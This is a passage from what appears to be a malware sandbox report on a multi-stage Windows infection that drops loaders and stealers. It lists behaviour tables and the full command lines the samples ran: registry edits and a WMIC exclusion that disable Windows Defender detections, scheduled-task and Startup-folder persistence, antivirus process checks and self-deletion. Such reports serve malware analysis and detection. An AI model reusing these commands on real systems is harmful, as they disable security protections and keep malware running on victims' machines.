1343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 | C:\Users\Admin\AppData\Roaming\EzUlZHXCL1.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000308001\freedom.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000169001\contorax.exe | N/A |
| N/A | N/A | C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\684126\Intake.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\684126\Intake.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\684126\Intake.pif | N/A |
| N/A | N/A | C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe | N/A |
| N/A | N/A | C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe | N/A |
| N/A | N/A | C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000169001\contorax.exe | N/A |
| N/A | N/A | C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\684126\Intake.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\684126\Intake.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\684126\Intake.pif | N/A |
| N/A | N/A | C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe | N/A |
| N/A | N/A | C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe | N/A |
| N/A | N/A | C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000308001\freedom.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\32840e92ff85953eb053cbd48e14155f9373064f1e6b991f26c00b541ea884c9.exe
"C:\Users\Admin\AppData\Local\Temp\32840e92ff85953eb053cbd48e14155f9373064f1e6b991f26c00b541ea884c9.exe"
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
"C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
C:\Users\Admin\AppData\Local\Temp\1000002001\gold.exe
"C:\Users\Admin\AppData\Local\Temp\1000002001\gold.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe
"C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Roaming\EzUlZHXCL1.exe
"C:\Users\Admin\AppData\Roaming\EzUlZHXCL1.exe"
C:\Users\Admin\AppData\Roaming\N4sHRj0hgX.exe
"C:\Users\Admin\AppData\Roaming\N4sHRj0hgX.exe"
C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe
"C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe"
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
"C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe"
C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe
"C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe"
C:\Users\Admin\AppData\Local\Temp\1000026001\joffer2.exe
"C:\Users\Admin\AppData\Local\Temp\1000026001\joffer2.exe"
C:\Users\Admin\AppData\Local\Temp\1000129001\Sеtup.exe
"C:\Users\Admin\AppData\Local\Temp\1000129001\Sеtup.exe"
C:\Users\Admin\AppData\Local\Temp\1000191001\needmoney.exe
"C:\Users\Admin\AppData\Local\Temp\1000191001\needmoney.exe"
C:\Users\Admin\AppData\Local\Temp\1000254001\penis.exe
"C:\Users\Admin\AppData\Local\Temp\1000254001\penis.exe"
C:\Users\Admin\AppData\Local\Temp\svchost015.exe
C:\Users\Admin\AppData\Local\Temp\svchost015.exe
C:\Users\Admin\AppData\Local\Temp\1000259001\bundle.exe
"C:\Users\Admin\AppData\Local\Temp\1000259001\bundle.exe"
C:\Users\Admin\AppData\Local\Temp\1000269001\acentric.exe
"C:\Users\Admin\AppData\Local\Temp\1000269001\acentric.exe"
C:\Users\Admin\AppData\Local\Temp\1000270001\RMS1.exe
"C:\Users\Admin\AppData\Local\Temp\1000270001\RMS1.exe"
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Users\Admin\AppData\Local\Temp\1000169001\contorax.exe
"C:\Users\Admin\AppData\Local\Temp\1000169001\contorax.exe"
C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe
"C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe"
C:\Users\Admin\AppData\Local\Temp\1000172001\3546345.exe
"C:\Users\Admin\AppData\Local\Temp\1000172001\3546345.exe"
C:\Users\Admin\AppData\Local\Temp\1000220001\crypteda.exe
"C:\Users\Admin\AppData\Local\Temp\1000220001\crypteda.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Roaming\8herr1KvkD.exe
"C:\Users\Admin\AppData\Roaming\8herr1KvkD.exe"
C:\Users\Admin\AppData\Roaming\DZo08TTbLE.exe
"C:\Users\Admin\AppData\Roaming\DZo08TTbLE.exe"
C:\Users\Admin\AppData\Local\Temp\1000221001\exbuild.exe
"C:\Users\Admin\AppData\Local\Temp\1000221001\exbuild.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2968 -s 1936
C:\Users\Admin\AppData\Local\Temp\1000223001\a6035a70b6.exe
"C:\Users\Admin\AppData\Local\Temp\1000223001\a6035a70b6.exe"
C:\Users\Admin\AppData\Local\Temp\service123.exe
"C:\Users\Admin\AppData\Local\Temp\service123.exe"
C:\Users\Admin\AppData\Local\Temp\service123.exe
"C:\Users\Admin\AppData\Local\Temp\service123.exe"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" Start-Sleep -Seconds 5; Remove-Item -Path 'C:\Users\Admin\AppData\Local\Temp\1000270001\RMS1.exe' -Force
C:\Users\Admin\AppData\Local\Temp\1000256001\BowExpert.exe
"C:\Users\Admin\AppData\Local\Temp\1000256001\BowExpert.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k move Luck Luck.bat & Luck.bat & exit
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
C:\Users\Admin\AppData\Local\Temp\1000262001\385107.exe
"C:\Users\Admin\AppData\Local\Temp\1000262001\385107.exe"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa opssvc"
C:\Users\Admin\AppData\Local\Temp\7zS6462.tmp\Install.exe
.\Install.exe
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
C:\Users\Admin\AppData\Local\Temp\7zS6685.tmp\Install.exe
.\Install.exe /jNjwdidayi "385107" /S
C:\Windows\SysWOW64\cmd.exe
cmd /c md 684126
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
C:\Windows\SysWOW64\findstr.exe
findstr /V "VegetablesIndividualBindingGba" Ever
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b ..\Wire + ..\Qualified + ..\Manufacturers + ..\Wesley + ..\Haiti + ..\Done + ..\Drop + ..\Runner + ..\Defend + ..\Judy + ..\Dow C
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Users\Admin\AppData\Local\Temp\684126\Intake.pif
Intake.pif C
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\choice.exe
choice /d y /t 5
C:\Windows\SysWOW64\cmd.exe
cmd /c schtasks.exe /create /tn "Additionally" /tr "wscript //B 'C:\Users\Admin\AppData\Local\SecureData Technologies\TurtleHarbor.js'" /sc minute /mo 5 /F
C:\Windows\SysWOW64\cmd.exe
cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TurtleHarbor.url" & echo URL="C:\Users\Admin\AppData\Local\SecureData Technologies\TurtleHarbor.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TurtleHarbor.url" & exit
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /create /tn "Additionally" /tr "wscript //B 'C:\Users\Admin\AppData\Local\SecureData Technologies\TurtleHarbor.js'" /sc minute /mo 5 /F
C:\Users\Admin\AppData\Local\Temp\1000268001\kitty.exe
"C:\Users\Admin\AppData\Local\Temp\1000268001\kitty.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1552 -s 536
C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Users\Admin\AppData\Local\Temp\1000305001\acentric.exe
"C:\Users\Admin\AppData\Local\Temp\1000305001\acentric.exe"
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Users\Admin\AppData\Local\Temp\1000306001\vlst.exe
"C:\Users\Admin\AppData\Local\Temp\1000306001\vlst.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bOYLEOfZCACcRQIJvG" /SC once /ST 05:04:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS6685.tmp\Install.exe\" c9 /kFdidSl 385107 /S" /V1 /F
C:\Users\Admin\AppData\Local\Temp\1000308001\freedom.exe
"C:\Users\Admin\AppData\Local\Temp\1000308001\freedom.exe"
C:\Users\Admin\AppData\Local\Temp\filename.exe
"C:\Users\Admin\AppData\Local\Temp\filename.exe"
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Users\Admin\AppData\Local\Temp\684126\RegAsm.exe
C:\Users\Admin\AppData\Local\Temp\684126\RegAsm.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 588 -s 1936
C:\Users\Admin\AppData\Local\Temp\7zS6685.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zS6685.tmp\Install.exe c9 /kFdidSl 385107 /S
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Users\Admin\AppData\Local\Temp\service123.exe
C:\Users\Admin\AppData\Local\Temp\/service123.exe
C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 